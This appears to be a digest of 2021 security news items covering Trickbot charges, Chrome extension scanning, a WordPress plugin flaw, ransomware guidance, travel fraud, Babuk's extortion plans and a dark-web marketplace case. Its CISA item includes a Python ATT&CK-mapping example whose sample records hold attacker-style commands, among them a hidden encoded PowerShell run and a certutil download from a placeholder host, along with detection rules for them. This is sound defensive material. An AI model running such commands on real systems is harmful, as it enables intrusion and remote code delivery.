Latvian National Indicted for Helping Develop and Spread Trickbot Malware

US authorities charged Alla Witte for helping build TrickBot, a type of malware that was active for many years in a worldwide campaign, defrauding numerous people.

Taking down much of TrickBot was a group effort involving multiple countries and a level of coordination that doesn’t usually happen with similar threats. While most of Trickbot’s infrastructure was eventually dismantled, a few servers remain active in countries where law enforcement agencies had no jurisdiction.

“The Trickbot malware was designed to steal the personal and financial information of millions of people around the world, thereby causing extensive financial harm and inflicting significant damage to critical infrastructure within the United States and abroad,” said Acting US Attorney Bridget M. Brennan of the Northern District of Ohio.

According to a CyberScoop report, 55-year-old Latvian citizen Alla Witte was arrested in Miami on February 6, 2021. She was just arraigned and charged with 19 counts, including conspiracy to commit computer fraud, aggravated identity theft, conspiracy to commit wire and bank fraud, bank fraud and conspiracy to commit money laundering, among others.

“Defendant ALLA WITTE, aka MAX, was a national of Russia,” says the Department of Defence in the indictment. “During the timeframe of this indictment, WITTE resided in Suriname. WITTE was a Malware Developer for the Trickbot Group, overseeing the creation of code related to the monitoring and tracking of authorized users of the Trickbot malware, the control and deployment of ransomware, obtaining payments from ransomware victims, and developing tools and protocols for the storage of credentials stolen and exfiltrated from victims infected by Trickbot.”

Another 18 people are mentioned in the DOJ report and named as co-conspirators or defendants. Most of them are from Russia, although the Trickbot group operated from Russia, Belarus, Ukraine and Suriname.

For now, it’s unclear what role Witte played in the Trickbot structure, but US law enforcement agencies will have to settle for just one arrest in this case, as the other defendants haven’t set foot in the US.

Google to Scan Extensions for Chrome to Weed out Malicious Files

Google announced that it’s strengthening the security of its Chrome browser by extending the functionality of Enhanced Safe Browsing to let users filter out malicious extensions.

One of Google Chrome’s strengths is the ability to install extensions that improve the user experience. Users can also manually install extensions from outside the official store, exposing themselves to possible malware. The new protection, of course, covers extensions installed from the Chrome Web Store.

“Enhanced Safe Browsing will now offer additional protection when you install a new extension from the Chrome Web Store,” says Google. “A dialog will inform you if an extension you’re about to install is not a part of the list of extensions trusted by Enhanced Safe Browsing.”

“Any extensions built by a developer who follows the Chrome Web Store Developer Program Policies, will be considered trusted by Enhanced Safe Browsing. For new developers, it will take at least a few months of respecting these conditions to become trusted,” Google added.

The company is also building a list of extensions trusted by the browser, but not all developers are on this list. Around 25% of all extensions are not trusted, a share Google hopes to shrink in the near future.

The new protections added to Google Chrome will extend to regular files as well, with the browser now checking whether a downloaded file could be suspicious. It’s doing so by looking at the file metadata and its download origin. Users can choose to keep the file despite the warning.

These new features have been available in the development version of Google Chrome, but they are now ready to be deployed in Chrome 91, the latest stable iteration.

Currently Active WordPress Plugin Vulnerability Lets Attackers Take Full Control, Research Finds

Security researchers have identified a vulnerability in the Fancy Product Designer plugin for WordPress that attackers are using right now in the wild, allowing them to upload malware to websites that use the plugin.

Countless malware campaigns use vulnerable websites to distribute compromised files or extract data. One way attackers do this is by taking control of websites that harbor a vulnerability, like the one in the Fancy Product Designer plugin.

The more popular a plugin, the greater the impact a flaw in it has on the online ecosystem, and the more attractive it becomes to attackers. According to researchers from Wordfence, more than 17,000 websites use the Fancy Product Designer plugin.

“Fancy Product Designer is a WordPress plugin that offers the ability for customers to upload images and PDF files to be added to products,” said the researchers. “Unfortunately, while the plugin had some checks in place to prevent malicious files from being uploaded, these checks were insufficient and could easily be bypassed, allowing attackers to upload executable PHP files to any site with the plugin installed. This effectively made it possible for any attacker to achieve Remote Code Execution on an impacted site, allowing full site takeover.”

The vulnerability is being exploited right now, which is why the researchers shared few details beyond indicators of compromise. The plugin developers have already released an update that fixes the problem, but it will take a while until enough websites switch to the new version.

From what the researchers have found so far, the attacker seems to be targeting e-commerce sites and attempting to extract order information from site databases. The latest information shows that the vulnerability has been exploited since at least Jan. 30, 2021.

Websites using the Fancy Product Designer plugin are urged to upgrade to the latest version as soon as possible. Just disabling the plugin is not sufficient.

White House Tells US Businesses to Deploy EDR in Wake of Ransomware Spate

The Biden administration is calling on businesses to take measures against a growing ransomware threat across the United States, urging both private and public organizations to raise effective defenses against threat actors.

In an open letter to corporate executives and business leaders, Anne Neuberger, Deputy Assistant to the President and Deputy National Security Advisor for Cyber and Emerging Technology, notes that ransomware incidents have significantly increased in number and size, in America and across the globe.

The letter recalls recent devastating attacks on hospitals, pipelines and banks, noting that “the threats are serious and they are increasing.”

It also notes that the private sector “has a critical responsibility to protect against these threats,” and that “companies that view ransomware as a threat to their core business operations rather than a simple risk of data theft will react and recover more effectively.”

“To understand your risk, business executives should immediately convene their leadership teams to discuss the ransomware threat and review corporate security posture and business continuity plans to ensure you have the ability to continue or quickly restore operations,” says Neuberger.

The letter includes the US Government’s guide to rapid progress on driving down risk, including several best practices from the President’s Executive Order issued May 12. Those include:

  • Multifactor authentication – because passwords alone are routinely compromised
  • Endpoint Detection & Response – to hunt for malicious activity on a network and block it
  • Encryption – so if data is stolen, it is unusable
  • A skilled, empowered security team – to patch rapidly, and share and incorporate threat information in your

“These practices will significantly reduce the risk of a successful cyberattack,” Neuberger writes.

IT administrators are urged to keep offline backups of important data, system images and configurations and regularly test them for signs of compromise.

The White House also instructs US companies to update and patch systems on a regular basis; test incident response plans; employ a pen testing team to check if a sophisticated attack can be stopped; and to segment networks to ensure that, if one network has been compromised, others continue operating.

Planning Your Summer Vacation? Here’s What You Need to Know to Avoid Holiday Booking Fraud

As countries across the globe ease Covid-19 restrictions for travel, consumers are preparing for a much-anticipated summer vacation. However, as the hospitality sector is off to a steady reboot, it’s not just vacationers who are excited about the prospects of relaxing at a beachside villa.

Fraudsters and scammers are in full attack mode as they prepare this year’s arsenal of fake booking websites and holiday offers to steal personal information and money from holidaymakers looking for last-minute deals and cheap property rentals.

Why identifying fake booking deals can be difficult

After months of strict social distancing and pandemic restrictions, individuals need the relaxation of a week or two at a seaside villa or lounging by the pool. Amid the excitement of an imminent vacation, many consumers overlook red flags, potentially turning a fiesta into an actual nightmare.

Online scammers have been doing their homework since the dawn of the internet, improving old ruses and sharpening their social engineering skills for maximum results.

Seasoned scammers set up fake websites that contain descriptions of idyllic vacation spots. The fraudulent websites often use the names of known companies and holiday providers, and even add legitimate details of the accommodation alongside stolen photographs from official websites. While an initial perusal of the website or platform may not initially raise suspicion for the customer, unbelievably low prices for high-demand destinations should.

As you book your summer vacation, beware of fraudulent emails, phone calls, fake websites, and posts on social media and search engines advertising special deals.

Warning signs of fraudulent booking and vacation deals

Before spending hundreds or thousands of dollars on your next stay at a bungalow, townhouse or seaside villa, watch out for fraud attempts by what may appear to be your favorite booking website:

  • The property requires payment via wire transfers – only use your credit card to pay for your booking to help make it easier to recover your money
  • Too-good-to-be-true prices – before making a decision, check the prices of similar bookings in the area you plan to stay. If the prices are much lower than yours or you are rushed into booking immediately, you should reconsider
  • Non-refundable deposit – many fake websites offer some of the lowest prices on the market and ask for a non-refundable deposit paid before your arrival. In reality, the properties do not exist, and customers are left without accommodation or money
  • Duplicate deals for the same property exist on multiple websites, some of which provide a different address description or photos – before booking, do a Google search and research the details of the property, matching the images in the ads to those on the official website
  • No booking confirmation, bill or contract received
  • The property’s availability calendar is not updated after your booking

Facebook Says WhatsApp Users Can Still Use the App if They Don’t Accept the New Terms

Facebook announced that WhatsApp won’t limit the app’s functionality for users who don’t accept the company’s proposed policy changes, backtracking on an earlier announcement saying the messaging app would slowly become unusable.

Facebook’s original announcement regarding the WhatsApp policy changes miffed many users. They were told they had to agree to share metadata between WhatsApp and Facebook, or the company would delete their accounts.

Shortly after, Facebook backtracked again, saying the app would initially show only a notification, then lose the ability to open the chat functions. The ability to respond to messages or calls directly from notifications would remain for a few more weeks, after which that feature would be removed. The result would be a completely unusable WhatsApp.

Now, Facebook is backtracking once more, saying it will no longer limit WhatsApp usage. The persistent message to accept the new terms and conditions would be the only indication from Facebook.

“No one will have their accounts deleted or lose functionality of WhatsApp on May 15th because of this update,” said the company. “Considering the majority of users who have seen the update have accepted, we’ll continue to display a notification in WhatsApp providing more information about the update and reminding those who haven’t had a chance to do so to review and accept. We currently have no plans for these reminders to become persistent and to limit the functionality of the app.”

Facebook could not enforce the new terms and conditions everywhere. Sharing data from WhatsApp to Facebook is not possible in the European Union, at least not in its current form, and it already has a problem in India, where it pushed the same update.

CISA Issues New Guidance to Help Admins Map Threat Actor Moves Based on MITRE ATT&CK Framework

The Cybersecurity & Infrastructure Security Agency (CISA) has released a set of best practices for mapping threat actor moves based on the MITRE ATT&CK framework. The objective is to encourage a common language in threat actor analysis, showing system administrators how to map adversary behavior through instructions and examples.

CISA created the guide in partnership with the Homeland Security Systems Engineering and Development Institute (HSSEDI), a DHS-owned R&D center operated by MITRE.

The 20-page analysis contains a set of mappings to develop adversary profiles, analyze trends and detect, respond to and mitigate threats.

“An increase in the number of organizations integrating the ATT&CK framework in their analysis will have a positive impact on the efficiency and efficacy of information sharing within the community,” CISA notes.

Acting as a lens for IT reps to identify and analyze adversary behavior, ATT&CK provides details on over 100 known threat actor groups and the techniques and malware they use to conduct their campaigns. The framework can be used to “identify defensive gaps, assess security tool capabilities, organize detections, hunt for threats, engage in red team activities, or validate mitigation controls,” CISA explains.

The document outlines the levels of adversary behavior, referred to in the infosec industry as TTPs (Tactics, Techniques and Procedures), and encourages analysts to use the interactive ATT&CK Navigator tool to highlight specific tactics and techniques and gain a visual perspective of the adversary’s moves.

Using the resource, analysts can even map raw data that may contain artifacts of adversarial behaviors, including shell commands, malware analysis results, artifacts retrieved from forensic disk images, packet captures, and Windows event logs.
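To illustrate the kind of mapping the guide describes, here is an added example (not CISA’s or MITRE’s code) that tags constructed Windows event-log records with Enterprise ATT&CK technique IDs using a small rule table and emits an ATT&CK Navigator layer. The technique IDs are real ATT&CK identifiers; the regex rules, the sample records and the layer version strings are this example’s own assumptions.

```python
"""Map constructed Windows event-log artifacts to ATT&CK technique IDs and
emit an ATT&CK Navigator layer. Added example, not CISA's or MITRE's code."""
import json
import re
from collections import Counter

# Constructed sample records (source, event ID, command line). Made up for
# this example; they are not real telemetry from any incident.
SAMPLE_EVENTS = [
    ("Security", 4688, r"powershell.exe -w hidden -enc QQBBAEEAQQA="),
    ("Security", 4688, r"cmd.exe /c schtasks /create /tn Updater /tr C:\Users\Public\up.exe /sc minute"),
    ("Security", 4688, r'wmic /node:10.0.0.9 process call create "calc.exe"'),
    ("Security", 4688, r"certutil.exe -urlcache -split -f http://example.invalid/x.bin C:\Temp\x.bin"),
    ("Sysmon", 1, r"net use \\10.0.0.7\C$ /user:corp\svc"),
    ("Security", 4688, r"notepad.exe C:\Users\alice\notes.txt"),
]

# Mapping rules: regex over the command line -> Enterprise ATT&CK technique ID.
# The IDs are real ATT&CK identifiers; the regexes are this example's own
# simplifications, not the mappings from the CISA guide.
RULES = [
    (r"powershell(\.exe)?\b.*\s-(enc|encodedcommand)\b", "T1059.001", "PowerShell with encoded command"),
    (r"\bschtasks(\.exe)?\s+/create\b", "T1053.005", "Scheduled task created"),
    (r"\bwmic(\.exe)?\b.*process\s+call\s+create", "T1047", "WMI process creation"),
    (r"\bcertutil(\.exe)?\b.*-urlcache\b", "T1105", "certutil fetched a remote file"),
    (r"\bnet\s+use\s+\\\\\S+\\[a-z]\$", "T1021.002", "Admin share connected"),
]


def map_event(command_line):
    """Return [(technique_id, comment), ...] for every rule matching one record."""
    return [(tid, why) for pattern, tid, why in RULES
            if re.search(pattern, command_line, re.IGNORECASE)]


def map_events(events):
    """Aggregate hits over all records into {technique_id: record_count}."""
    counts = Counter()
    for _source, _event_id, cmd in events:
        for tid, _why in map_event(cmd):
            counts[tid] += 1
    return dict(counts)


def navigator_layer(counts, name="Constructed sample intrusion"):
    """Build an ATT&CK Navigator layer dict; the version strings are assumptions."""
    return {
        "name": name,
        "versions": {"attack": "9", "navigator": "4.3", "layer": "4.2"},  # assumed
        "domain": "enterprise-attack",
        "description": "Techniques seen in the constructed event-log sample",
        "techniques": [
            {"techniqueID": tid, "score": n, "comment": f"{n} matching record(s)"}
            for tid, n in sorted(counts.items())
        ],
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0,
                     "maxValue": max(counts.values(), default=1)},
    }


if __name__ == "__main__":
    layer = navigator_layer(map_events(SAMPLE_EVENTS))
    print(json.dumps(layer, indent=2))  # load via Navigator's "Open Existing Layer"
```

The benign notepad record maps to nothing, which is the point of keeping rules narrow: a layer built this way shows only behavior that actually matched.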

A generous portion of the write-up is dedicated to Trickbot, the infamous Trojan-turned-Swiss-army-knife malware that threat actors use to conduct a myriad of illicit cyber activities.

Finally, the document includes a hefty list of mitigations that network defenders can use to strengthen the security posture of their organizations’ systems.

CISA’s alert on Technical Approaches to Uncovering and Remediating Malicious Activity offers extra information on addressing potential incidents and applying best practice incident response procedures.

Pipeline Companies Will Be Fined $7,000 per Day if They Fail to Report a Breach – Reports

TSA’s new directive mandating that pipeline operators take cybersecurity seriously is being met with skepticism by experts. It has also sparked rumors of a $7,000 penalty for each day that a breach goes unreported.

Last week, the US Department of Homeland Security’s Transportation Security Administration announced a directive to “better identify, protect against, and respond to threats to critical companies in the pipeline sector.”

The directive mandates that critical pipelines report cybersecurity incidents, including potential incidents, to the Cybersecurity and Infrastructure Security Agency (CISA). Operators must also now have a Cybersecurity Coordinator on hand and report incidents to CISA.

More recent reports say pipeline operators who fail to comply with the new requirements stand to incur penalties, even though the directive doesn’t mention fines explicitly. Officials who asked to remain unidentified told Bloomberg that “the directive will impose fines on pipeline companies that fail to report incidents within 12 hours.”

“This is the first time there’s mandatory reporting of cybersecurity incidents,” according to one of the officials who spoke to journalists ahead of the directive’s unveiling.

A CSO report even mentions actual numbers:

“Although not appearing anywhere in the directive, pipeline companies that fail to meet the security requirements would be subject to financial fines, starting at $7,000 per day,” the report notes, back-linking to the same Bloomberg piece. It is worth noting that Bloomberg’s sources didn’t mention actual numbers.

Oil and gas companies reportedly met the directive with skepticism, with many calling the move rushed out to show that steps are being taken in the wake of the Colonial Pipeline ransomware attack.

Former Justice Department and Navy Department lawyer Robert Cattanach tells CSO that imposing strict fines means going through lengthy rulemaking proceedings.

“That’s a years-long process. There’s no way they could actually impose fines without going to comment,” Cattanach said.

Babuk ransomware gang says it’s no longer interested in encrypting data, would rather kidnap it instead

In the early days of ransomware, things were fairly simple: malware would infect your company’s infrastructure, encrypting your valuable data with a secret key known only to your attackers.

If you had shown the foresight of making secure backups in advance, you could get back up and running again. But if you had no backups, your only chance of getting your data back was if you were prepared to pay a ransom to the gang hell-bent on extorting a sometimes hefty cryptocurrency payment from you.

But in recent years there have been more and more ransomware attacks combined with the exfiltration of data prior to its encryption. If criminal hackers have a copy of your data, you don’t have the “get-out-of-jail-free” card of a secure backup to play, because your extortionists can also threaten to publish your data online regardless of whether you have successfully recovered your systems, potentially damaging your brand and relationships with customers and business partners.

In April, as reported by Bleeping Computer, the Babuk ransomware gang announced that it was stepping back from encrypting victims’ data.

Although normally such news would be welcomed, in this case the Babuk gang announced that they were not ceasing their criminal activities entirely – instead, they were planning to concentrate on data-theft extortion.

In a post on its then active website on the dark web, the Babuk group announced its plans in rather broken English:

I not so long ago wrote about the closure of babuk, yes, you all correctly understood babuk as a partensky program will be closed, but it will live in its new understanding, we are a promoted brand with the best pentesters of dark net We are a young project and everyone already knows about us, during this time we have gone gone ahead of other groups, we respect other groups but not all, for example, we express our loyalty to DopplePaymer, Ragnar. Babuk changes direction, we no longer encrypt information on networks, we will get to you and take your data, we will notify you about it if you do not get in touch we make an announcement. Also for other groups that do not have their own blog or have but they want to exert additional pressure, you can not be placed with us.

A later post by Babuk explained that it was moving forward with its plans to create “something really cool”:

Hello! We announce the development of something really cool, a huge platform for independent leaks, we have no rules and bosses, we will publish private products in a single information platform where we will post leaks of successful no-name teams that do not have their own blogs and names, these are not girls who run with ship like rats and change the policy of their resources. these are really strong guys.

Sadly, it appears that Babuk have kept their word, and have now launched a new dark web website called “Payload Bin” – seemingly designed to share information from companies who have had their data hacked but have refused to pay a ransom.

To launch their new website, the source code from a hacked video game manufacturer was put up for auction on the Payload Bin website.

One potential reason why this particular ransomware gang may prefer to steal copies of data from their victims is that they are worried about the massive disruption which can occur if systems are locked up through encryption – and whether that could lead to a bigger punishment if the culprits are ever identified.

Furthermore, things may get complicated for ransomware-as-a-service (RAAS) operations where there may be more than one criminal gang thinking of targeting the same organisation. If companies believe it’s pointless paying a ransom because they will just get hit again one week later, that doesn’t bode well for earnings of the criminal side of the ransomware industry in the long run.

Whatever the reasoning, it’s not necessarily the case that data-theft extortion will automatically yield larger rewards for cybercriminals, especially when you consider how awkward and time-consuming it might be to steal a vast amount of data from a hacked organisation.

Russian Citizen Will Serve 30 Months Behind Bars for Running Dark Web Marketplace for Stolen Personal Data

Russian citizen Kirill Victorovich Firsov will serve 30 months in prison for administering an underground website that fueled the cybercriminal community for nearly seven years.

According to a press release, the defunct platform DEER.IO hosted around 3,000 shops that sold stolen credit card information, phone numbers, Social Security numbers, and services.

The DOJ claimed this illegal operation drove profits exceeding $17 million since October 2013, with a turnover of at least $1.2 million from victims in the US.

The US Attorney’s Office of the Southern District of California said the accused was aware that his platform was peddling stolen and counterfeit accounts, including several icons for US-based companies.

“Anyone setting up a store on DEER.IO could click on to then sell stolen accounts from those U.S. companies,” the DOJ said. “Also, DEER.IO was easily searchable, so anyone –including Firsov– could search the platform for stolen U.S. accounts and information.”

On top of stolen gamer accounts sold on the platform, addresses, telephone numbers and other personally identifiable information of American citizens were available for purchase. FBI field agents arrested Firsov in New York on March 7, 2020, after he flew in from Moscow.

Prior to his arrest, the FBI purchased 1,100 gamer accounts and personal information on more than 3,600 Americans from his platform.

“This platform provided cybercriminals with easy access to the personal accounts and information of people around the world, including Americans,” said Acting US Attorney Randy Grossman. “Stopping that flow of stolen information to criminals is critical to addressing the cybercrime threats facing our country, and we will prosecute those who are responsible.”

The FBI encourages companies and individuals to contact local authorities whenever they suspect or learn they’re victims of cybercrime by notifying field offices or submitting a complaint via the Internet Crime Complaint Center (IC3).
